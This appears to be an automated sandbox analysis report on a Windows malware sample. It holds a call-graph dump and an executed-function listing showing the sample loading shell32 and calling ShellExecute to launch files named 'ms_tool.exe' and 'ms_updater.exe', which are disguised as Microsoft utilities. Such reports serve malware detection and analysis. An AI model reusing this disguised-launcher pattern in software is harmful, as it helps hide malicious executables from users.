46 API calls 21867->21871 21869->21849 21870->21862 21871->21856 21874 f6c853 __wsopen_s 46 API calls 21872->21874 21873->21862 21874->21862 21875->21759 21876->21806 21888 f61fe0 LeaveCriticalSection 21877->21888 21879 f708a5 21879->21727 21879->21728 21881 f6817a __dosmaperr 14 API calls 21880->21881 21884 f70617 21881->21884 21882 f70624 21883 f681d7 ___free_lconv_mon 14 API calls 21882->21883 21885 f70679 21883->21885 21884->21882 21886 f687bf __wsopen_s 6 API calls 21884->21886 21885->21814 21887 f70753 EnterCriticalSection 21885->21887 21886->21884 21887->21814 21888->21879 21890 f6c867 _Fputc 21889->21890 21891 f6c772 __wsopen_s 46 API calls 21890->21891 21892 f6c87c 21891->21892 21893 f5fa59 _Fputc 44 API calls 21892->21893 21894 f6c88b 21893->21894 21894->21832 21894->21833 21896 f75fe1 21895->21896 21897 f75ff9 21895->21897 21899 f61f31 __dosmaperr 14 API calls 21896->21899 21898 f7634f 21897->21898 21903 f7603f 21897->21903 21900 f61f31 __dosmaperr 14 API calls 21898->21900 21901 f75fe6 21899->21901 21902 f76354 21900->21902 21904 f61f44 __dosmaperr 14 API calls 21901->21904 21906 f61f44 __dosmaperr 14 API calls 21902->21906 21905 f75fee 21903->21905 21907 f7604a 21903->21907 21913 f7607a 21903->21913 21904->21905 21905->21837 21908 f76057 21906->21908 21909 f61f31 __dosmaperr 14 API calls 21907->21909 21911 f61e30 _Ungetc 44 API calls 21908->21911 21910 f7604f 21909->21910 21912 f61f44 __dosmaperr 14 API calls 21910->21912 21911->21905 21912->21908 21914 f76093 21913->21914 21915 f760de 21913->21915 21916 f760ad 21913->21916 21914->21916 21922 f76098 21914->21922 21919 f694cc std::_Locinfo::_Locinfo_ctor 15 API calls 21915->21919 21917 f61f31 __dosmaperr 14 API calls 21916->21917 21918 f760b2 21917->21918 21920 f61f44 __dosmaperr 14 API calls 21918->21920 21923 f760ef 21919->21923 21921 f7596d __wsopen_s 44 API calls 21925 f7622b 21921->21925 21922->21921 21926 f681d7 ___free_lconv_mon 14 API calls 21923->21926 21959 f77891 _Fputc 21958->21959 21989 f778b5 21959->21989 22093 f653d1 22092->22093 22094 f653bc 22092->22094 22093->21852 22095 f61f44 __dosmaperr 14 API calls 22094->22095 22096 f653c1 22095->22096 22097 f61e30 _Ungetc 44 API calls 22096->22097 22098 f653cc 22097->22098 22098->21852 22100 f6ad29 _Fputc 22099->22100 22101 f6ad4d __wsopen_s 69 API calls 22100->22101 22102 f6ad3b 22101->22102 22103 f5fa59 _Fputc 44 API calls 22102->22103 22104 f6ad48 22103->22104 22104->21861 22105->21708 23257 f5f99d 23258 f62c79 ___scrt_uninitialize_crt 71 API calls 23257->23258 23259 f5f9a5 23258->23259 23267 f6899b 23259->23267 23261 f5f9aa 23262 f68a46 14 API calls 23261->23262 23263 f5f9b9 DeleteCriticalSection 23262->23263 23263->23261 23264 f5f9d4 23263->23264 23265 f681d7 ___free_lconv_mon 14 API calls 23264->23265 23266 f5f9df 23265->23266 23268 f689a7 __FrameHandler3::FrameUnwindToState 23267->23268 23277 f61f98 EnterCriticalSection 23268->23277 23270 f68a1e 23278 f68a3d 23270->23278 23273 f689f2 DeleteCriticalSection 23275 f681d7 ___free_lconv_mon 14 API calls 23273->23275 23274 f5fc1d 72 API calls 23276 f689b2 23274->23276 23275->23276 23276->23270 23276->23273 23276->23274 23277->23276 23281 f61fe0 LeaveCriticalSection 23278->23281 23280 f68a2a 23280->23261 23281->23280 21618 f5af9f 21619 f5bab1 GetModuleHandleW 21618->21619 21620 f5afa7 21619->21620 21621 f5afdd 21620->21621 21622 f5afab 21620->21622 21623 f6535e std::locale::_Setgloballocale 23 API calls 21621->21623 21626 f5afb6 21622->21626 21627 f65340 21622->21627 21625 f5afe5 21623->21625 21628 f65182 std::locale::_Setgloballocale 23 API calls 21627->21628 21629 f6534b 21628->21629 21629->21626 25069 f63399 25070 f633ac _Fputc 25069->25070 25075 f632d0 25070->25075 25072 f633c1 25073 f5fa59 _Fputc 44 API calls 25072->25073 25074 f633ce 25073->25074 25076 f63305 25075->25076 25077 f632e2 25075->25077 25076->25077 25080 f6332c 25076->25080 25078 f61db3 _Fputc 44 API calls 25077->25078 25079 f632fd 25078->25079 25079->25072 25083 f631d5 25080->25083 25084 f631e1 __FrameHandler3::FrameUnwindToState 25083->25084 25091 f5f9e9 EnterCriticalSection 25084->25091 25086 f631ef 25092 f63230 25086->25092 25088 f631fc 25101 f63224 25088->25101 25091->25086 25093 f62bab ___scrt_uninitialize_crt 69 API calls 25092->25093 25094 f6324b 25093->25094 25095 f68a46 14 API calls 25094->25095 25096 f63255 25095->25096 25097 f63270 25096->25097 25098 f6817a __dosmaperr 14 API calls 25096->25098 25097->25088 25099 f63294 25098->25099 25100 f681d7 ___free_lconv_mon 14 API calls 25099->25100 25100->25097 25104 f5f9fd LeaveCriticalSection 25101->25104 25103 f6320d 25103->25072 25104->25103 23332 f58573 23337 f556a0 23332->23337 23334 f585be __Mtx_unlock 23336 f585a4 23336->23334 23343 f58a85 23336->23343 23347 f5a714 23337->23347 23340 f556ba 23340->23336 23344 f58a92 23343->23344 23440 f5a725 GetCurrentThreadId 23344->23440 23346 f58aba 23346->23336 23380 f5a4d4 23347->23380 23350 f58bca 23351 f58bd5 23350->23351 23352 f58be8 23350->23352 23351->23352 23354 f5f7b3 23351->23354 23410 f58bf7 23352->23410 23355 f67a10 std::locale::_Setgloballocale 2 API calls 23354->23355 23356 f5f7b8 23355->23356 23357 f5f7c3 23356->23357 23358 f67a55 std::locale::_Setgloballocale 44 API calls 23356->23358 23359 f5f7cd IsProcessorFeaturePresent 23357->23359 23360 f5f7ec 23357->23360 23358->23357 23361 f5f7d9 23359->23361 23362 f6535e std::locale::_Setgloballocale 23 API calls 23360->23362 23363 f61c34 std::locale::_Setgloballocale 8 API calls 23361->23363 23364 f5f7f6 __FrameHandler3::FrameUnwindToState 23362->23364 23363->23360 23365 f5f80a 23364->23365 23368 f5f82a 23364->23368 23366 f61f44 __dosmaperr 14 API calls 23365->23366 23367 f5f80f 23366->23367 23369 f61e30 _Ungetc 44 API calls 23367->23369 23370 f5f83c 23368->23370 23371 f5f82f 23368->23371 23373 f556ca 23369->23373 23372 f67c48 17 API calls 23370->23372 23374 f61f44 __dosmaperr 14 API calls 23371->23374 23375 f5f845 23372->23375 23374->23373 23376 f5f84c 23375->23376 23377 f5f859 23375->23377 23378 f61f44 __dosmaperr 14 API calls 23376->23378 23379 f5f897 LeaveCriticalSection 23377->23379 23378->23373 23379->23373 23381 f5a536 23380->23381 23382 f5a4fc GetCurrentThreadId 23380->23382 23383 f5a560 23381->23383 23384 f5a53a GetCurrentThreadId 23381->23384 23385 f5a507 GetCurrentThreadId 23382->23385 23386 f5a522 23382->23386 23387 f5a5fe GetCurrentThreadId 23383->23387 23391 f5a581 23383->23391 23388 f5a549 23384->23388 23385->23386 23389 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 23386->23389 23387->23388 23388->23386 23390 f5a647 GetCurrentThreadId 23388->23390 23393 f556b3 23389->23393 23390->23386 23398 f5aa6e 23391->23398 23393->23340 23393->23350 23395 f5a5bd GetCurrentThreadId 23395->23388 23396 f5a58c __Xtime_diff_to_millis2 23395->23396 23396->23386 23396->23388 23396->23395 23397 f5aa6e 2 API calls 23396->23397 23397->23396 23399 f5aa87 __aulldiv __aullrem 23398->23399 23400 f5aa7a 23398->23400 23399->23396 23400->23399 23402 f5aa47 23400->23402 23405 f5ad79 23402->23405 23406 f5ad96 GetSystemTimeAsFileTime 23405->23406 23407 f5ad8a GetSystemTimePreciseAsFileTime 23405->23407 23408 f5aa55 23406->23408 23407->23408 23408->23399 23411 f58c0d 23410->23411 23418 f58b7d 23411->23418 23419 f58b89 __EH_prolog3_GS 23418->23419 23428 f55730 23419->23428 23422 f51590 std::ios_base::_Init 46 API calls 23423 f58bb2 23422->23423 23432 f556e0 23423->23432 23425 f58bba 23437 f5b4a9 23425->23437 23429 f55751 23428->23429 23429->23429 23430 f55e30 std::ios_base::_Init 46 API calls 23429->23430 23431 f55763 23430->23431 23431->23422 23433 f556eb 23432->23433 23434 f55706 codecvt 23432->23434 23433->23434 23435 f61e40 std::ios_base::_Init 44 API calls 23433->23435 23434->23425 23436 f5572a 23435->23436 23438 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 23437->23438 23439 f5b4b3 23438->23439 23439->23439 23440->23346 23452 f5116f 23453 f51178 23452->23453 23458 f592b5 23453->23458 23455 f51187 23456 f5b44f 47 API calls 23455->23456 23457 f511d3 23456->23457 23459 f592c1 __EH_prolog3 23458->23459 23460 f5b1e3 codecvt 16 API calls 23459->23460 23461 f592d0 23460->23461 23463 f592e2 std::locale::_Init 23461->23463 23464 f58e8e 23461->23464 23463->23455 23465 f58e9a __EH_prolog3 23464->23465 23466 f58aee std::_Lockit::_Lockit 7 API calls 23465->23466 23467 f58ea5 23466->23467 23475 f58ed6 23467->23475 23476 f58ff3 23467->23476 23469 f58b46 std::_Lockit::~_Lockit 2 API calls 23471 f58f16 std::locale::_Init 23469->23471 23470 f58eb8 23482 f59016 23470->23482 23471->23463 23474 f58de6 _Yarn 15 API calls 23474->23475 23475->23469 23477 f5b1e3 codecvt 16 API calls 23476->23477 23478 f58ffe 23477->23478 23479 f59012 23478->23479 23486 f58d22 23478->23486 23479->23470 23483 f58ec0 23482->23483 23484 f59022 23482->23484 23483->23474 23489 f5ab6a 23484->23489 23487 f58de6 _Yarn 15 API calls 23486->23487 23488 f58d5c 23487->23488 23488->23470 23490 f5f7b3 23489->23490 23491 f5ab7a EncodePointer 23489->23491 23492 f67a10 std::locale::_Setgloballocale 2 API calls 23490->23492 23491->23483 23491->23490 23493 f5f7b8 23492->23493 23494 f67a55 std::locale::_Setgloballocale 44 API calls 23493->23494 23497 f5f7c3 23493->23497 23494->23497 23495 f5f7cd IsProcessorFeaturePresent 23498 f5f7d9 23495->23498 23496 f5f7ec 23499 f6535e std::locale::_Setgloballocale 23 API calls 23496->23499 23497->23495 23497->23496 23500 f61c34 std::locale::_Setgloballocale 8 API calls 23498->23500 23501 f5f7f6 __FrameHandler3::FrameUnwindToState 23499->23501 23500->23496 23502 f5f80a 23501->23502 23505 f5f82a 23501->23505 23503 f61f44 __dosmaperr 14 API calls 23502->23503 23504 f5f80f 23503->23504 23506 f61e30 _Ungetc 44 API calls 23504->23506 23507 f5f83c 23505->23507 23508 f5f82f 23505->23508 23510 f5f81a 23506->23510 23509 f67c48 17 API calls 23507->23509 23511 f61f44 __dosmaperr 14 API calls 23508->23511 23512 f5f845 23509->23512 23510->23483 23511->23510 23513 f5f84c 23512->23513 23514 f5f859 23512->23514 23515 f61f44 __dosmaperr 14 API calls 23513->23515 23516 f5f897 LeaveCriticalSection 23514->23516 23515->23510 23516->23510

                                                      Executed Functions

                                                      Function 00F53860 Relevance: 17.7, APIs: 3, Strings: 6, Instructions: 1961libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryW.KERNELBASE(shell32.dll), ref: 00F54CBA
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00F54F44
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00F54F62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteShell$LibraryLoad
                                                      • String ID: !$%x and %p$\ms_tool.exe$\ms_updater.exe$open$shell32.dll
                                                      • API String ID: 1367575721-2575606789
                                                      • Opcode ID: 11f94cd4dd20f2f6b8902ac010856ce33058d341da303a7fcf4c14f4dd5f5c5a
                                                      • Instruction ID: 64120a538ef869beb5213b304cb3abb7c263a51e300583150d48b81a32e56ed9
                                                      • Opcode Fuzzy Hash: 11f94cd4dd20f2f6b8902ac010856ce33058d341da303a7fcf4c14f4dd5f5c5a
                                                      • Instruction Fuzzy Hash: E6B20527A30A1A07E30CA5388C523E6B68AEBD6731F454336FE66D73F4D3694846D740
                                                      Function 00F73C4C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00F73905: CreateFileW.KERNELBASE(?,00000000,?,00F73CF5,?,?,00000000,?,00F73CF5,?,0000000C), ref: 00F73922
                                                      • GetLastError.KERNEL32 ref: 00F73D60
                                                      • __dosmaperr.LIBCMT ref: 00F73D67
                                                      • GetFileType.KERNELBASE(00000000), ref: 00F73D73
                                                      • GetLastError.KERNEL32 ref: 00F73D7D
                                                      • __dosmaperr.LIBCMT ref: 00F73D86
                                                      • CloseHandle.KERNEL32(00000000), ref: 00F73DA6
                                                      • CloseHandle.KERNEL32(00F68017), ref: 00F73EF3
                                                      • GetLastError.KERNEL32 ref: 00F73F25
                                                      • __dosmaperr.LIBCMT ref: 00F73F2C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 61c5c325619ca7ef94f9af2cbf7f61285afa5f7ed742c7353118483ebcc21b8c
                                                      • Instruction ID: d6b3c81c1054d9f29fafa14513f8f449405aff7fe4976f1f3dd9d2c8947a5d28
                                                      • Opcode Fuzzy Hash: 61c5c325619ca7ef94f9af2cbf7f61285afa5f7ed742c7353118483ebcc21b8c
                                                      • Instruction Fuzzy Hash: 00A14932E14158AFCF199F68DC51BAD3BB1AB06320F14415EF8159B3A1C7349E12FB92
                                                      Function 00F54C70 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 262libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • LoadLibraryW.KERNELBASE(shell32.dll), ref: 00F54CBA
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00F54F44
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00F54F62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteShell$LibraryLoad
                                                      • String ID: !$\ms_tool.exe$\ms_updater.exe$open$shell32.dll
                                                      • API String ID: 1367575721-3118137208
                                                      • Opcode ID: 023fe09e9da69b28d441d089bf35c28ba98085476ffba42cb78551b4f0b13580
                                                      • Instruction ID: b676dd6d55a7f818f25218f15afc3f8b07588f2cf802b5d017a41af7bc214b67
                                                      • Opcode Fuzzy Hash: 023fe09e9da69b28d441d089bf35c28ba98085476ffba42cb78551b4f0b13580
                                                      • Instruction Fuzzy Hash: F7A1F1706083409BE724DF28CC46F6AB7E4BF85705F144A1CFA858B291E7B4E949DB92
                                                      Function 00F65219 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,00F65213,00000016,00F5FC1C,?,?,8C9F690D,00F5FC1C,?), ref: 00F6522A
                                                      • TerminateProcess.KERNEL32(00000000,?,00F65213,00000016,00F5FC1C,?,?,8C9F690D,00F5FC1C,?), ref: 00F65231
                                                      • ExitProcess.KERNEL32 ref: 00F65243
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 68ed4075f42d5afa7a991797561f34cdee828c64cf4b41fc5d9b505453ade4ac
                                                      • Instruction ID: 4485f6a05932abea852745063a71b6860f7872cefb566e97ee72ee52a5f618ac
                                                      • Opcode Fuzzy Hash: 68ed4075f42d5afa7a991797561f34cdee828c64cf4b41fc5d9b505453ade4ac
                                                      • Instruction Fuzzy Hash: 66D09E32000508AFCF012FA0DC1D95D3F25EF90791F454460B91E59031DB799995BB42
                                                      Function 00F6AE55 Relevance: 3.2, APIs: 2, Instructions: 191fileCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 353 f6ae55-f6ae74 354 f6b04e 353->354 355 f6ae7a-f6ae7c 353->355 358 f6b050-f6b054 354->358 356 f6ae7e-f6ae9d call f61db3 355->356 357 f6aea8-f6aece 355->357 364 f6aea0-f6aea3 356->364 360 f6aed4-f6aeda 357->360 361 f6aed0-f6aed2 357->361 360->356 363 f6aedc-f6aee6 360->363 361->360 361->363 365 f6aef6-f6af01 call f6a9a2 363->365 366 f6aee8-f6aef3 call f6c893 363->366 364->358 371 f6af43-f6af55 365->371 372 f6af03-f6af08 365->372 366->365 375 f6afa6-f6afc6 WriteFile 371->375 376 f6af57-f6af5d 371->376 373 f6af2d-f6af41 call f6a568 372->373 374 f6af0a-f6af0e 372->374 395 f6af26-f6af28 373->395 377 f6b016-f6b028 374->377 378 f6af14-f6af23 call f6a93a 374->378 380 f6afd1 375->380 381 f6afc8-f6afce GetLastError 375->381 382 f6af94-f6afa4 call f6aa20 376->382 383 f6af5f-f6af62 376->383 384 f6b032-f6b044 377->384 385 f6b02a-f6b030 377->385 378->395 389 f6afd4-f6afdf 380->389 381->380 400 f6af7d-f6af80 382->400 390 f6af64-f6af67 383->390 391 f6af82-f6af92 call f6abe4 383->391 384->364 385->354 385->384 396 f6afe1-f6afe6 389->396 397 f6b049-f6b04c 389->397 390->377 398 f6af6d-f6af78 call f6aafb 390->398 391->400 395->389 401 f6b014 396->401 402 f6afe8-f6afed 396->402 397->358 398->400 400->395 401->377 404 f6b006-f6b00f call f61f0d 402->404 405 f6afef-f6b001 402->405 404->364 405->364
                                                      APIs
                                                        • Part of subcall function 00F6A568: GetConsoleOutputCP.KERNEL32(8C9F690D,00000000,00000000,00F5FC3C), ref: 00F6A5CB
                                                      • WriteFile.KERNELBASE(FFBF67E8,00000000,?,00F5FAF9,00000000,00000000,00000000,00000000,?,?,00F5FAF9,?,?,00F87CB8,00000010,00F5FC3C), ref: 00F6AFBE
                                                      • GetLastError.KERNEL32(?,00F5FAF9,?,?,00F87CB8,00000010,00F5FC3C,?,?,00000000,?), ref: 00F6AFC8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConsoleErrorFileLastOutputWrite
                                                      • String ID:
                                                      • API String ID: 2915228174-0
                                                      • Opcode ID: 1a0bb558516d3cc5ef9718892cb14ec4fa611647e2d6a37b58dc5cf97d5e42ab
                                                      • Instruction ID: 3c0c000fcba3a3dbb1198f1cd1a88679aa8966f0e3b4b7f84370d8f20bfa1d14
                                                      • Opcode Fuzzy Hash: 1a0bb558516d3cc5ef9718892cb14ec4fa611647e2d6a37b58dc5cf97d5e42ab
                                                      • Instruction Fuzzy Hash: 3661AFB2D04149AEDF11CFA8C884AEEBFB9AF19314F144185E814B7252D376D941EFA2
                                                      Function 00F68E03 Relevance: 3.1, APIs: 2, Instructions: 63COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 408 f68e03-f68e17 call f709cf 411 f68e1d-f68e25 408->411 412 f68e19-f68e1b 408->412 413 f68e27-f68e2e 411->413 414 f68e30-f68e33 411->414 415 f68e6b-f68e8b call f7093e 412->415 413->414 416 f68e3b-f68e4f call f709cf * 2 413->416 417 f68e35-f68e39 414->417 418 f68e51-f68e61 call f709cf FindCloseChangeNotification 414->418 425 f68e9d 415->425 426 f68e8d-f68e9b call f61f0d 415->426 416->412 416->418 417->416 417->418 418->412 430 f68e63-f68e69 GetLastError 418->430 428 f68e9f-f68ea2 425->428 426->428 430->415
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00F68CEA,00000000,CF830579,00F88088,0000000C,00F68DA6,00F5FB8F,?), ref: 00F68E59
                                                      • GetLastError.KERNEL32(?,00F68CEA,00000000,CF830579,00F88088,0000000C,00F68DA6,00F5FB8F,?), ref: 00F68E63
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                      • String ID:
                                                      • API String ID: 1687624791-0
                                                      • Opcode ID: f62e9140e18f4311821d32a837103f848c823fad21585a0011250af1553559a6
                                                      • Instruction ID: ea4117d2dcb5329f44d17fc31eb525c71693eacf723ab7b1ad6e7350fd4e6ff1
                                                      • Opcode Fuzzy Hash: f62e9140e18f4311821d32a837103f848c823fad21585a0011250af1553559a6
                                                      • Instruction Fuzzy Hash: 7211AF33E052186AD62022B09C5577E37554FD27B4F25070DFA08872D3DF768C827292
                                                      Function 00F55050 Relevance: 3.0, APIs: 2, Instructions: 22synchronizationthreadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 433 f55050-f5508d CreateThread WaitForSingleObject call f5aff0 435 f55092-f55095 433->435
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,00F54C70,00000000,00000000,8C9F690D), ref: 00F55076
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,000000B0,?,?,?), ref: 00F5507F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 1891408510-0
                                                      • Opcode ID: 4697811367ba5b7aa1826d9d20f7774c040fe3b2bb4c16ebb3bddf06406ebe05
                                                      • Instruction ID: 6a0d2be247f4e7aea5e1a95af76a0572e74fd0b82741801e7e4dca73e6e392a8
                                                      • Opcode Fuzzy Hash: 4697811367ba5b7aa1826d9d20f7774c040fe3b2bb4c16ebb3bddf06406ebe05
                                                      • Instruction Fuzzy Hash: CBE086706483006BD710AF34EC0BF2E37E4BB48B12F610A18F699962D0E674B458A757
                                                      Function 00F67FD8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 436 f67fd8-f67ffe call f67dae 439 f68057-f6805a 436->439 440 f68000-f68012 call f73c2c 436->440 442 f68017-f6801c 440->442 442->439 443 f6801e-f68056 442->443
                                                      APIs
                                                      Memory Dump Source
